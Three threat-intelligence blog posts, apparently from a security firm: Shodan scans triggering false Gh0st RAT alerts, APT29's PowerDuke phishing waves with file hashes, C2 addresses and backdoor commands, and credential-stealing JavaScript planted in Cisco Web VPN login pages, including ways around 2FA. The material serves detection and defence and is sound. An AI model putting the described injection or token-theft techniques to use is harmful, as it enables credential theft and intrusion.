Have you been haunted by the Gh0st RAT today?

If you run certain network monitoring and security appliances, you may have had a few small heart attacks today. Organizations all around the world are receiving alerts that they may have a system that is infected with the Gh0st remote access trojan (RAT). Making things worse is that it will likely appear that it is a server that is infected. The good news is there is a very strong chance the alerting is a false positive. There is likely nothing malicious going on and all your need to do is tune your signatures.

It turns out that Shodan is doing scans across the Internet in what appears to be an attempt to identify Gh0st RAT command and control (C2) servers. If you are not familiar with Gh0st, it’s a full featured RAT that sends a packet flag that is typically shared by the command and control server. The default packet flag, of which there are many variations, is none other than Gh0st. It may not actually be necessary to send the correct string to get a Gh0st C2 server to respond, but it can’t hurt the effort. In the cases that Volexity has observed thus far, Shodan is sending the following:

0000000: 4768 3073 74ad 0000 00e0 0000 0078 9c4b  Gh0st……..x.K
0000010: 5360 6098 c3c0 c0c0 06c4 8c40 bc51 9681  S“……..@.Q..
0000020: 8109 4807 a716 9565 26a7 2a04 2426 672b  ..H….e&.*.$&g+
0000030: 1832 94f6 b030 30ac a872 6300 0111 a082  .2…00..rc…..
0000040: 1f5c 6026 83c7 4b37 8619 e56e 0c39 956e  .\`&..K7…n.9.n
0000050: 0c3b 840f 33ac e873 6368 a85e cf34 274a  .;..3..sch.^.4’J
0000060: 97a9 82e3 30c3 9168 5d26 90f8 ce97 53cb  ….0..h]&….S.
0000070: 4134 4c3f 323d e1c4 9286 0b40 f560 0c54  A4L?2=…..@.`.T
0000080: 1fae af5d 0a72 0b03 23a3 dc02 7e06 8603  …].r..#…~…
0000090: 2b18 6dc2 3dfd 7443 2c43 fd4c 3c3c 3d3d  +.m.=.tC,C.L<<==
00000a0: 5c9d 1988 00e5 2002 0054 f52b 5c         \….. ..T.+\

Not too far into the traffic is a zlib header. You can easily decode this traffic from a packet capture file with a framework like ChopShop. The Shodan traffic decodes to the following:

TOKEN: LOGIN: WIN-T9UN4HIIHEC: Windows 7 Service Pack 1 – Build: 7601 – Clock: 4000 Mhz – IP: 192.168.1.60 Webcam: yes

The Shodan scans are sending traffic that would be consistent with an infected Windows 7 system named WIN-T9UN4HIIHEC.

What this boils down to is that your alerts for a Gh0st RAT infection are likely false positives and the result of inbound scanning. Shodan is an excellent resource of information and constantly does scans to catalog different parts of the Internet. You can easily verify this by looking at the direction of the traffic, observing if the source of the traffic is from Shodan, or by looking at the payload and comparing it with the above. You can tune any alerting you might have to make sure this traffic is alerting based on traffic outbound from and not inbound to your network.

PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs

In the wake of the 2016 United States Presidential Election, not even six hours after Donald Trump became the nation’s President-Elect, an advanced persistent threat (APT) group launched a series of coordinated and well-planned spear phishing campaigns. Volexity observed five different attack waves with a heavy focus on U.S.-based think tanks and non-governmental organizations (NGOs). These e-mails came from a mix of attacker created Google Gmail accounts and what appears to be compromised e-mail accounts at Harvard’s Faculty of Arts and Sciences (FAS). These e-mails were sent in large quantities to different individuals across many organizations and individuals focusing in national security, defense, international affairs, public policy, and European and Asian studies. Two of the attacks purported to be messages forwarded on from the Clinton Foundation giving  insight and perhaps a postmortem analysis into the elections. Two of the other attacks purported to be eFax links or documents pertaining to the election’s outcome being revised or rigged. The last attack claimed to be a link to a PDF download on “Why American Elections Are Flawed.” Volexity believes a group it refers to as The Dukes (also known as APT29 or Cozy Bear) is responsible for post-election attack activity.

Background

Since August of this year, Volexity has been actively involved in investigating and tracking several attack campaigns from the Dukes. Most notably the Dukes have previously been tied to the breach of the Democratic National Committee (DNC) and intrusions into multiple high-profile United States Government organizations. In July 2015, the Dukes started heavily targeting  think tanks and NGOs. This represented a fairly significant shift in the group’s previous operations and one that continued in the lead up to and immediately after the 2016 United States Presidential election.

On August 10, 2016 and August 25, 2016, the Dukes launched several waves of highly targeted spear phishing attacks against several U.S.-based think tanks and NGOs. These spear phishing messages were spoofed and made to appear to have been sent from real individuals at well-known think tanks in the United States and Europe. These August waves of attacks purported to be from individuals at Transparency International, the Center for a New American Security (CNAS),  the International Institute for Strategic Studies (IISS), Eurasia Group, and the Council on Foreign Relations (CFR).

The Dukes are known for launching their attacks by sending links to ZIP files, that contain malicious executables, hosted on legitimate compromised web servers. However, each of the e-mail messages from the August attacks contained a Microsoft Office Word (.doc) or Excel (.xls) attachment. These attachments, when viewed, contained legitimate report content from each of the organizations they appeared to have been sent from. However, the attackers inserted macros into the documents designed to install a malware downloader on the system. Successful exploitation would result in the download of a PNG image file from a compromised webserver. These attack campaigns leveraged steganography in the PNG files by hiding components of a backdoor that would exist only in memory after being loaded into rundll32.exe. Volexity has dubbed this backdoor PowerDuke. Similar attack campaigns using documents with macros dropping PowerDuke were further observed through October, where Universities, and not think tanks appear to have been the primary targets. Details of these attacks have been provided to Volexity customers. Concerned NGO’s and Universities that may have been targeted by these attacks campaigns are welcome to reach out for additional details.

November 9 – Post-Election Spear Phishing Waves

The post-election attacks launched by the Dukes on November 9 were very similar to previous attacks seen from the Dukes in both 2015 and 2016. The PowerDuke malware, first seen in August 2016, was once again used in these most recent attacks. Three of the five attack waves contained links to download files from domains that the attackers appear to have control over. The other two attacks contained documents with malicious macros embedded within them. Each of these different attack waves were slightly different from one another and are detailed below.

Attack Wave 1: eFax – The “Shocking” Truth About Election Rigging

The first attack wave is similar to much older attacks from the Dukes that purport to be an electronic Fax. This message claims to have been sent from Secure Fax Corp. and has a link to a ZIP file that contains a Microsoft shortcut file (.LNK). This shortcut file contains PowerShell commands that conduct anti-VM checks, drop a backdoor, and launch a clean decoy document. The e-mail message was sent from the attacker controlled e-mail account industry.faxsolution@gmail.com. The screen shot below shows the e-mail that was sent.

cozy-efax-link

The e-mail contained links pointing to the following URL:

hxxp://efax.pfdweek[.]com/eFax/message0236.ZIP

Inside of this password (1854) protected ZIP file is a Microsoft shortcut file named:

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk

Note that pfdweek[.]com appears to be under the control of the attackers but may be a hijacked domain.

Details on each of the files are included below.

Filename: message0236.ZIP
File size: 643843 bytes
MD5 hash: bea0a6f069bd547db685698bc9f9d25a
SHA1 hash: ee09bec09388338134d47fa993d5e0f86efe5bd4
Notes: Password protected ZIP file containing malicious Microsoft shortcut file (37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk)

Filename: 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk
File size: 724003 bytes
MD5 hash: c272aebc661c54cc960ba9a4a3578952
SHA1 hash: 52d62213c66a603e33dab326bf4fa29d6ac681c4
Notes: Microsoft shortcut file with embedded PowerShell, PowerDuke backdoor (hqwhbr.lck), and clean decoy document.

Filename: kxwn.lock
File size:  10752 bytes
MD5 hash: 28b95a2c399e60ee535c32e73860fbea
SHA1 hash: bf4ce67b6e745e26fcf3a2d41938a9dff1395076
Notes: Primary PowerDuke backdoor (DLL) loader (leverages kxwn.lock:schemas) dropped to “%APPDATA\Roaming\Microsoft\” with persistence via HKCU Run Key “WebCache” (rundll32.exe %APPDATA\Roaming\Microsoft\kxwn.lock , #2). Connects directly to 173.243.80.6:443 for command and control.

Filename: kxwn.lock:schemas
File size:  609853 bytes
MD5 hash: 4e1dec16d58ba5f4196f6a76a0bca75c
SHA1 hash: a7c43d7895ecef2b6306fb00972c321060753361
Notes: Alternate data stream (ADS) PNG  file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA).

Attack Wave 2: eFax – Elections Outcome Could Be revised [Facts of Elections Fraud]

The second attack wave that Volexity observed leveraged a Microsoft Word document with a malicious embedded macro. This appears to be consistent with several previous Dukes attack campaigns, such as those on August 25, 2016. The Macros contain several anti-VM checks designed to avoid executing in virtualized environments. The e-mail message was sent from the attacker controlled e-mail account securefaxsolution@gmail.com.

The screen shot below shows the e-mail that was sent.

cozy-efax-docDetails on the malware components of this attack wave are included below.

Filename: election-headlines-FTE2016.docm
File size: 835072 bytes
MD5 hash: a8e700492e113f73558131d94bc9ae2f
SHA1 hash: b5684384c8028f0324ed7119f6abf379f2789970
Notes: Document containing malicious macro that drops

Filename: fywhx.dll
File size: 10752 bytes
MD5 hash: ad6723f61e10aefd9688b29b474a9323
SHA1 hash: dd766876b3be5022bfb062f454f878abfbc670b8
Notes: PowerDuke backdoor file dropped to “%APPDATA\Roaming\HP\” with persistence via HKCU Run Key “ToolboxFX” (rundll32.exe %APPDATA\Roaming\HP\fywhx.dll #2). Connects directly to 185.132.124.43:443 for command and control.

Filename: fywhx.dll:schemas
File size:  608854 bytes
MD5 hash: 8c53ee9137a7d540fcff0d523f7d0822
SHA1 hash: ab32c09c46e0c9dbc576fefee68e5a2f57e0482e
Notes: Alternate data stream (ADS) PNG  file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA).

Attack Wave 3: Why American Elections Are Flawed

Volexity believes the following e-mail received the widest distribution among the targeted organizations. The e-mail purports to have been sent from Harvard’s “PDF Mobile Service” or “PFD Mobile Service”. The spelling of this non-existent service is inconsistent in the e-mail.  The latter spelling appears to be a typographical error that is consistent with the domain names registered by the attackers. The screen shot below shows the e-mail that was sent.

coz-link1The e-mail contained links pointing to the following URL:

hxxp://efax.pfdresearch[.]org/eFax/RWP_16-038_Norris.ZIP

Inside of this password (8734) protected ZIP file is an executable named:

RWP16-038_Norris.exe

Note that pfdresearch[.]org appears to be under the control of the attackers but may be a hijacked domain.

Details on the malware components of this attack wave are included below.

Filename: RWP_16-038_Norris.ZIP
File size: 854996 bytes
MD5 hash: 8b3050a95e3ce00424b85f6e9cc3ccec
SHA1 hash: d5dcf445830c54af145c0dfeaebf28f8ec780eb5
Notes: Password protected ZIP file with malicious executable inside (RWP16-038_Norris.exe).

Filename: RWP16-038_Norris.exe
File size: 1144832 bytes
MD5 hash: 3335f0461e5472803f4b19b706eaf4b5
SHA1 hash: 5cc807f80f14bc4a1d6036865e50d576200dfd2e
Notes: Dropper for PowerDuke backdoor and clean decoy document

Filename: gwV46iIc.idx
File size:  10752 bytes
MD5 hash: ae997d2047705ff46a0c228f7b5d7052
SHA1 hash: 1067ddd5615518e0cbac7389a024b32f119a3229
Notes: Primary PowerDuke backdoor (DLL) loader (leverages gwV46iIc.idx:schemas) dropped to “%APPDATA\Roaming\Apple\” with persistence via HKCU Run Key “ConnectionCenter” (rundll32.exe %APPDATA\Roaming\Apple\gwV46iIc.idx, #2). Connects directly to 185.124.86.121:443 for command and control.

Filename: gwV46iIc.idx:schemas
File size:  580968 bytes
MD5 hash: 7b9b51cb44cd6a7af1cd28faeeda04a7
SHA1 hash: e3bd7bdfe0026cf4ee39fd75a771eac52ffea095
Notes: Alternate data stream (ADS) PNG  file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA).

Attack Wave 4: Clinton Foundation FYI #1

The fourth attack wave that Volexity observed leveraged a Microsoft Word document with a malicious embedded macro. This appears to be consistent with several previous Dukes attack campaigns, such as those on August 25, 2016. The Macros contain several anti-VM checks designed to avoid executing in virtualized environments. The screen shot below shows the e-mail that was sent.

cozy-doc

coz-doc-bottom

Details on the malware components of this attack wave are included below.

Filename: harvard-iop-fall-2016-poll.doc
File size: 2808832 bytes
MD5 hash: ead48f15ebc088384a4bd6190c2343fa
SHA1 hash: 0b9dccfcb2cc8bced343b9d930e475f1d0e5d966
Notes: Document containing malicious macro that drops impku.dat and impku.dat:shemas.

Filename:  impku.dat
File size: 10752 bytes
MD5 hash: 9f420779c90e118a0b5fd904380878a1
SHA1 hash: 11523d859e9a818c2628d7954502cbdb5eeb2199
Notes: PowerDuke backdoor file dropped to “%APPDATA\Roaming\Dell\” with persistence via HKCU Run Key “Communicator” (rundll32.exe %APPDATA\Roaming\Dell\impku.idat, #2). Connects directly to 185.26.144.109:443 for command and control.

Filename: impku.dat:schemas
File size:  608854 bytes
MD5 hash: b774f39d31c32da0f6a5fb5d0e6d2892
SHA1 hash: ae3ff39c2a7266132e0af016a48b97d565463d90
Notes: Alternate data stream (ADS) PNG  file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA).

Attack Wave 5: Clinton Foundation FYI #2

The fifth attack wave that Volexity observed once against leveraged a download link and a new domain that appears to be under control of the attackers. The link in the e-mail points to a ZIP file that has a Microsoft shortcut file (.LNK) inside of it. This shortcut file contains PowerShell commands that conduct anti-VM checks, drop a backdoor, and launch a clean decoy document. Like Attack Wave #3, this e-mail message also purported to be forwarded from Laura Graham at the Clinton Foundation. The message body contained dozens of e-mail addresses to which the message originally claims to have been sent, with organizations similar to Attack Wave #3. The e-mail message from this attack wave, with identifying information removed, is shown below.

cozy-link2cozy-link2-bottom

As seen in the screen shot above, the e-mail contained links pointing to the following URL:

hxxp://efax.pfdregistry[.]net/eFax/37486.ZIP

Inside of this password (6190) protected ZIP file a Microsoft Shortcut file named:

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk

Note that pfdregistry[.]net appears to be under the control of the attackers but may be a hijacked domain.

Details on the malware components of this attack wave are included below.

Filename: 37486.ZIP
File size: 580688 bytes
MD5 hash: f79caf27a99c091e6c1775b306993341
SHA1 hash: a76c02c067eae26d78f4b494274dfa6aedc6fa7a
Notes: Password protected ZIP file containing malicious Microsoft shortcut file 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk.

Filename: 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk
File size: 661782 bytes
MD5 hash: f713d5df826c6051e65f995e57d6817d
SHA1 hash: 68ce4c0324f03976247ff48803a7d988f9f9f43f
Notes: Microsoft shortcut file with embedded PowerShell, PowerDuke backdoor (hqwhbr.lck), and clean decoy document.

Filename: hqwhbr.lck
File size: 10752 bytes
MD5 hash: 57c627d68e156676d08bfc0829b94331
SHA1 hash: 4bcbf078a78ba0e842f78963ba9dd71240ab6a6d
Notes: PowerDuke backdoor file dropped to “%APPDATA\Roaming\Skype\” with persistence via HKCU Run Key “IAStorIcon” (rundll32.exe %APPDATA\Roaming\Apple\hqwhbr.lck, #2).  Connects directly to 177.10.96.30:443 for command and control.

Filename: hqwhbr.lck:schemas
File size: 547636 bytes
MD5 hash: cbf96820dc74a50a91b2b8b94376682a
SHA1 hash: 5f105801a1abb398dadc756480713f9bd7a4aa73
Notes: Alternate data stream (ADS) PNG  file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA).

The PowerDuke Backdoor

The PowerDuke backdoor boasts a pretty extensive list of features that allow the Dukes to examine and control a system. Volexity suspects the feature set that has been built into PowerDuke is an extension of their anti-VM capabilities in the initial dropper files. Several commands supported by PowerDuke facilitate getting information about the system.

A previous analysis of PowerDuke showed it supported the following commands.

comp get the NetBIOS name via GetComputerNameEx
domain get the computer’s domain via NetWkstaGetInfo
drives get logical drives, drive type, free space, serial number, etc.
fsize get the size of a file via GetFileAttributesExW or failing that, by mapping the file and getting the size
kill stop a process via TerminateProcess
memstat get memory usage status via GlobalMemoryStatusEx, total RAM, percent used, etc.
osdate get the time the machine was built (via InstallDate registry key)
osver get OS info via registry, such as ProductName, CurrentBuild, CurrentVersion, CSDBuildNumber, etc.
pslist list processes via CreateToolhelp32Snapshot
pwd get current directory via GetCurrentDirectoryW
run start a process via CreateProcessW
# runs cmd.exe /c and gets the output via Named Pipe and sends the data back
siduser gets the current user’s SID via GetTokenInformation and LookupAccountSidW
time the time + timezone (GetLocalTime and GetTimeZoneInformation)
uptime number of seconds since the last boot
user the user’s name via GetUserNameExW
wipe writes random data across a file, then deletes the file
wnd gets the text of the current foreground window
fgetp download file
fputp upload file
power reboot or shutdown (via previously loaded PowrProf.dll)
cdt change to temporary directory
reqdelay sleep for specified time

Volexity has not fully examined the PowerDuke instances from these campaigns but has noted the malware appears to support the following additional commands not described above:

  • sidcomp
  • buzy
  • exit
  • copy
  • detectav
  • mkdir
  • software
  • shlist
  • shinfo
  • shdel
  • shadd
  • setpng
  • conn
  • setsrv

Volexity may update this post following further PowerDuke analysis.

Network Indicators

Below are network indicators associated with download URLs for the aforementioned Dukes attack campaigns.

Hostname IP Address ASN Information
efax.pfdresearch.org 81.82.196.162 6848 | 81.82.0.0/15 | TELENET | BE | telenet.be | Telenet Operaties N.V.
efax.pfdregistry.net 65.15.88.243 7018 | 65.15.64.0/19 | ATT-INTERNET4 | US | bellsouth.net | Bellsouth.net Inc.
efax.pfdweek.com 84.206.44.194 31581 | 84.206.0.0/16 | KOPINT | HU | ekg.kopdat.hu | National Infocommunications Service Company Limited by Shares

Below are network indicators associated with command and control servers for the aforementioned Dukes attack campaigns.

IP Address ASN Information
185.124.86.121 43260 | 185.124.86.0/24 | DGN | TR | – | –
185.132.124.43 43260 | 185.132.124.0/24 | DGN | TR | – | –
185.26.144.109 60721 | 185.26.144.0/24 | BURSABIL | TR | bursabil.com.tr | Bursabil Konfeksiyon Tekstil Bilisim Teknoloji insaat Sanayi ve Ticaret Limited Sirketi
173.243.80.6 14979 | 173.243.80.0/24 | AERONET-WIRELESS | PR | aeronetpr.com | Aeronet Wireless
177.10.96.30 262848 | 177.10.96.0/21 | Naja | BR | najatel.com.br | Naja Telecomunicacoes Ltda.

 

Conclusion

The Dukes continue to launch well-crafted and clever attack campaigns. They have had tremendous success evading anti-virus and anti-malware solutions at both the desktop and mail gateway levels. The group’s anti-VM macros and PowerShell scripts appear to have drastically reduced the number of sandboxes and bots that the group has to deal with on their command and control infrastructure. This combined with their use of steganography to hide their backdoor within PNG files that are downloaded remotely and loaded in memory only or via alternate data streams (ADS) is quite novel in its approach. Volexity believes that the Dukes are likely working to gain long-term access into think tanks and NGOs and will continue to launch new attacks for the foreseeable future.

 

Follow us on Twitter @Volexity, @stevenadair, @5ck, @imhlv2, @attrc

Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence

In the world of information security, there is never a dull moment. Part of the fun of working in this space is that you always get to see attackers do something new or put a new spin on something old. Last month at the CERT-EU Conference in Brussels, Belgium, Volexity gave a presentation on a recent evolution in how attackers are maintaining persistence within victim networks. The method, which involves modifying the login pages to Cisco Clientless SSL VPNs (Web VPN), is both novel and surprisingly obvious at the same time. Attackers have been able to successfully implant JavaScript code on the login pages that enables them to surreptitiously steal employee credentials as they login to access internal corporate resources.

Whether you are proactively monitoring your network or reactively undergoing an incident response, one of the last places you might examine for backdoors are your firewalls and VPN gateway appliances. As the industry is learning, firewalls, network devices, and anything else an attacker might be able to gain access to should be scrutinized just as much as any workstation or server within an organization. Having your own devices turned against you can make for a bad week. This represents yet another way attackers are taking credential theft and network persistence to the next level.

Cisco Clientless SSL VPN (Web VPN)

The Cisco Clientless SSL VPN (Web VPN) is a web-based portal that can be enabled on an organization’s Cisco Adaptive Security Appliance (ASA) devices. The Cisco Web VPN does not require a thick client and is accessed entirely through a web browser by end users. Once a user is authenticated to the Web VPN, based on the permissions the user has, they may be able to access internal web resources, browse internal file shares, and launch plug-ins that allow them to telnet, ssh, or VNC to internal resources. The average user would interface with their organization’s Cisco Web VPN via a screen similar to the one show in Figure 1 below.

cisco-basic-login

Figure 1. Cisco Clientless SSL VPN Login Page

 

This is certainly not a resource to which you want an attacker to gain access. Unfortunately, Volexity has found that several organizations are silently being victimized through this very login page. This begs the question: How are the attackers managing to pull this off? It turns out it’s possible through a couple different methods. The first method involves an exploit and the second requires good old fashion administrative access.

CVE-2014-3393: Security Appliance Turned Security Risk

Volexity has been able to track its earliest known abuse of Cisco Web VPN login pages back to November 2014. It appears to have started with CVE-2014-3393, a vulnerability in, you guessed it, the Cisco Clientless SSL VPN portal. This issue was initially reported by Alec Stuart-Muirk and was covered by Cisco Advisory ID: cisco-sa-20141008-asa on October 8, 2014. Cisco also released a notice about public exploitation of the vulnerability on February, 18, 2015. An excerpt from the original advisory describing the vulnerability is shown below.

A vulnerability in the Clientless SSL VPN portal customization framework could allow an unauthenticated, remote attacker to modify the content of the Clientless SSL VPN portal, which could lead to several attacks including the stealing of credentials, cross-site scripting (XSS), and other types of web attacks on the client using the affected system.

The vulnerability is due to a improper implementation of authentication checks in the Clientless SSL VPN portal customization framework. An attacker could exploit this vulnerability by modifying some of the customization objects in the RAMFS cache file system. An exploit could allow the attacker to bypass Clientless SSL VPN authentication and modify the portal content.

lizard-laugh

Figure 2. The lizard that could

 

Later in the same month at Ruxcon 2014, Stuart-Murik further detailed the Cisco Clientless SSL VPN vulnerability in a presentation titled “Breaking Bricks and Plumbing Pipes: Cisco ASA a Super Mario Adventure“. Coinciding with his presentation, a Metasploit module was released that could be leveraged to exploit vulnerable servers.

Exploitation in the Wild

While Cisco provided updated software to address the vulnerability, attackers were already off to the races. Vulnerable organizations that were slow to update may have received an unwelcome addition to the source of their logon.html file. Figure 3 below shows malicious JavaScript, as seen from the source of an impacted organizations Cisco Web VPN login page.

cisco-initial-script

Figure 3. Malicious JavaScript on Cisco Web VPN

 

While not visible due to URL obfuscation, the file 1.js was hosted on the compromised website of a legitimate NGO. This website also leveraged a valid SSL certificate, which kept all communications encrypted. The file 1.js was a variant of an online script called “xss.js” that was designed to steal form data. Victim organizations effectively had their Cisco Web VPN devices turned into credential collectors for the attackers. This particular round of attacks appears to have compromised several organizations around the globe. Volexity observed this campaign successfully compromising the following verticals:

  • Medical
  • Think Tank / NGO
  • University and Academic Institutions
  • Multi-national Electronics / Manufacturing

Volexity also observed a number of other compromises that appear to have occurred later on. In another case, the attackers compromised a different legitimate NGO to host their malicious JavaScript. In that case, Volexity was not able to obtain a copy of the code as it had been taken down already. The table below contains additional details on exploit URLs that Volexity observed being used in the wild to exploit the organization’s Cisco Web VPNs.

URL Notes
https://103.42.181.84/2/css.js This IP no longer appears to host a malicious JavaScript file. The domain cscoelab.com previously resolved to the IP address 103.42.181.84. Note: cscoelab.com currently resolves to 43.251.116.175.
http://webxss.cn/mu5AOh?1440094244 webxss.cn has been down in every instance Volexity tried to connect to it. It appears the website likely allowed users to upload and host their own JavaScript. The epoch timestamp appending to the end of URI may indicate the URL was created on August 20, 2015.

 

Administratively Compromised

In several other cases involving breaches to the Cisco Web VPN, it is unclear if an exploit was leveraged or if the attackers actually already had sufficient credentials to directly modify the login page through administrative access. Volexity has worked on several past intrusions where attackers have thoroughly breached an organization and have been able to gain access to security devices, networking equipment, and other critical information technology resources. Attackers are typically able to gain “legitimate” access throughout a victim organization’s environment by installing keyloggers, dumping credentials from systems, exfiltrating documents (spreadsheets) that contain password lists, and identifying passwords that are commonly reused by administrators. Once armed with these credentials, an attacker with access to a victim’s network can typically perform the same functions as any administrator or highly-privileged individual within the company.

Volexity knows it is 100% possible and surmises it may be likely in some cases that the attackers leveraged credentialed administrative access to a Cisco ASA appliance in order to modify the login page. This can be done via the Cisco Adaptive Security Device Manager (ASDM), a Java administrative interface for Cisco firewalls that can be accessed via a web browser. Access to the devices ASDM should be restricted through access control lists (ACLs) as tightly as possible. At minimum, this is not an interface that should be open to the Internet. Attackers that are able to access this interface by having access to a victim’s environment or due to an ACL misconfiguration can easily modify code that is loaded via the Cisco Web VPN login page.

Organizations can also examine the settings for the Clientless SSL VPN from within the ASDM to verify that nothing is out of the ordinary. In order verify the Web VPN settings, you must first be logged into the ASDM. Then you can navigate to the following: Remote Access VPN -> Clientless SSL VPN Access -> Portal -> Customization. Once at this screen, you can load the various components of the Portal Page. Below is an example of the default view of the Title Panel settings for the Logon Page. This is the most commonly modified area of the Web VPN that’s been observed by Volexity thus far.

ASDM-Title-Default

Figure 4. Cisco Web VPN Customization

All an attacker has to do to modify this page to display malicious code is to add JavaScript/HTML anywhere in the text field. It is also possible for an attacker to upload their own JavaScript file to the Cisco Web VPN.

 

Japanese Government and High-Tech Industries Targeted

One of the most targeted series of attacks that Volexity has observed leveraging these techniques has been against the Japanese Government and High-Tech industries. In these attacks, multiple Japanese organizations were compromised and had their Cisco Web VPN portals modified to load additional JavaScript code. The URL format of the JavaScript code, that was inserted into the source look familiar to some blog readers.

cisco-scanbox-js

Figure 5. Scanbox on Cisco Web VPN

 

The JavaScript in these attacks links back to a JavaScript profiling and exploitation framework called Scanbox. The framework has been observed in use primary by Chinese APT groups since at least June 2014. Scanbox is often used to gather information about users visiting a compromised site. In particular, by gathering information about a user’s browser and software installed on the system, the framework can be leveraged to launch attacks against interesting targets and specific vulnerable software. One of Scanbox’s additional features, capturing keystrokes and cookie data, comes in handy when an employee is attempting to access their Web VPN. The images below are taken from other Scanbox components loaded via accounts.nttdocomo.mailsecure.cc later in the redirection chain.

scanbox-keylog

Figure 6. Scanbox Keylogger

 

scanbox-cisco-g

Figure 7. Keylog and Cookie Reporting URL

 

The code shown in Figures 6 and 7 are just a small excerpt of the Scanbox keylogger plugin. Other functions that facilitate building the URI associated with captured keystrokes are not shown. The Scanbox code on the Japanese Government and High-Tech Cisco Web VPNs were being used to record data on users accessing the services. This allowed the attackers to steal credentials in real-time and maintain persistent access to the networks of the victim organizations. Volexity worked with JP-CERT in June of this year to share relevant information on this threat.

Additional Hostnames and Domains

Digging into the attacker controlled domain mailsecure.cc turns up a few more interesting hosts.

account.mhi.co.jp.mailsecure.cc
booking.elinn-kyoto.com.mailsecure.cc
www.jimin.jp.mailsecure.cc

Following the theme of accounts.nttdocomo.mailsecure.cc are hostnames of other popular Japanese companies and websites. Volexity did not observe this round of attacks associated with any of the organizations from the subdomain. It appears the attackers are using the names of legitimate Japanese companies and websites in an effort to make the traffic blend in with legitimate traffic. Digging into the e-mail address on the WHOIS registration for mailsecure.cc, westlife678s@hotmail.com, leads to several other domains owned by the attackers.

Domain
Creation Date
Expiration Date
E-mail
googlecontent.cc 2015-04-21 2016-04-21 westlife678s@hotmail.com
googleupmail.com 2014-07-31 2015-07-31 westlife678s@hotmail.com
googleusercontent.cc 2014-12-16 2015-12-16 westlife678s@hotmail.com
govmailserver.com 2014-11-26 2015-11-26 westlife678s@hotmail.com
mailsecure.cc 2015-01-19 2016-01-19 westlife678s@hotmail.com
novartis-it.com 2014-12-16 2015-12-16 westlife678s@hotmail.com
symantecse.com 2014-12-11 2015-12-11 westlife678s@hotmail.com

Further research into these domains also yields interesting subdomains. A few of the themes appear to look similar to valid Google hosts and others, once again, have a Japanese oriented theme to them.

account.googlecontent.cc
accounts.googlecontent.cc
bak.googleupmail.com
docomo.symantecse.com
image.googleusercontent.cc
ja.googleupmail.com
japanese.symantecse.com
jp.googleupmail.com
jp.govmailserver.com
jpa.googleupmail.com
lh4.googleusercontent.cc
mail.googlecontent.cc
secure.symantecse.com
security.symantecse.com
serves.googlecontent.cc
service.googlecontent.cc
service.googleupmail.com
webmail.nira.or.jp.symantecse.com
www.googleupmail.com
www.govmailserver.com

Interestingly, Novartis AG filed a complaint about the domain novartis-it.com with the World Intellectual Property Organization (WIPO). In a decision made on September 7, 2015, it was determined the domain should be transferred to Novartis. As a result, this domain may not be under attacker control for much longer.

The Malware Connection: PlugX

Until recently, Volexity did not have the above threat activity tied to specific malware or another known threat group. Several of the above hostnames were leveraging the IP address 255.255.0.0 when parked or not in use. Volexity tracks a threat group that also uses this IP when inactive, but this was not enough to definitively link the two. However, on July 31 and August 18 of this year, multiple hostnames from the aforementioned list and hostnames tied to PlugX malware overlapped on the IP addresses 108.61.222.27 and 104.207.142.124. The following hostnames, not previously confirmed as connected to the list above, were now on overlapping infrastructure:

beservices.googlemanage.com
googleze.googlemanage.com
help.googlemanage.com
help.operaa.net
helpze.operaa.net
microsoft.operaa.net
microsofthy.operaa.net
microsoftno.operaa.net
microsoftoldcl.operaa.net
microsoftze.operaa.net
renkneu.operaa.net
services.googlemanage.com
services.operaa.net
siling.operaa.net
zeservices.googlemanage.com

In particular, a public report (TR-24) from the Computer Incident Response Center Luxembourg (CIRCL) describes a PlugX variant that communicates with microsoft.operaa.net and microsoftno.operaa.net. Also, previous but now defunct hostnames associated with this threat actor shows an affinity for Novartis. The following hostnames can be found online and in passive DNS:

alconnet.eu.novartis.googlemanage.com
phusau-l00310.eu.novartis.operaa.net

The list below contains active non-parking IP resolutions and ASN information for this groups various hostnames:

IP Address ASN Information
103.243.25.72 133731 | 103.243.24.0/22 | TOINTER-AS | CN | – | Shanghai Fanyun software Co.LTD
104.207.142.124 20473 | 104.207.136.0/21 | AS-CHOOPA | US | vultr.com | Vultr Holdings LLC
157.7.221.152 7506 | 157.7.128.0/17 | INTERQ | JP | gmo.jp | GMO Internet Inc.

 

Two-Factor Authentication (2FA)

An obvious question and concern is whether or not two-factor authentication (2FA) mitigates the risks in the above scenarios. The short answer is no. Volexity always recommends that organizations of all sizes implement 2FA for all remote network access. This can go a long way to preventing a stolen username and password from giving an attacker keys to the kingdom. However, in this particular scenario, if an attacker is able to load malicious JavaScript through the Cisco Web VPN portal, it would be trivial for them to modify the code to do one of two things:

  1. Session Cookie Theft: The malicious code could be modified to specifically steal session cookies after a user has established an authenticated session. In Volexity’s testing, it was possible to have two simultaneous Cisco Web VPN sessions using the same session cookies. This means an attacker could leverage the same session as an active legitimate user without either of them being disconnected.
  2. Token Theft and Reuse: Assuming a user’s 2FA leverages a numeric token (or similar), an attacker could potentially hijack the user’s initial authentication attempt and quickly reuse that token to access the victim infrastructure. This would prevent the user from initially logging into their own infrastructure. However, the attacker could then set a cookie to prevent subsequent authentication attempts from being hijacked. Preventing the user from ever authenticating would raise many flags, whereas only interfering with a single login attempt is less likely to result in discovery.

Leveraging 2FA on VPNs is a must for organizations. However, it should not be seen as bullet proof. Users are still susceptible to being phished or otherwise having their authentication attempts hijacked. The attackers are fairly ingenious and will likely find a way to gain access, if they are motivated enough.

Conclusion

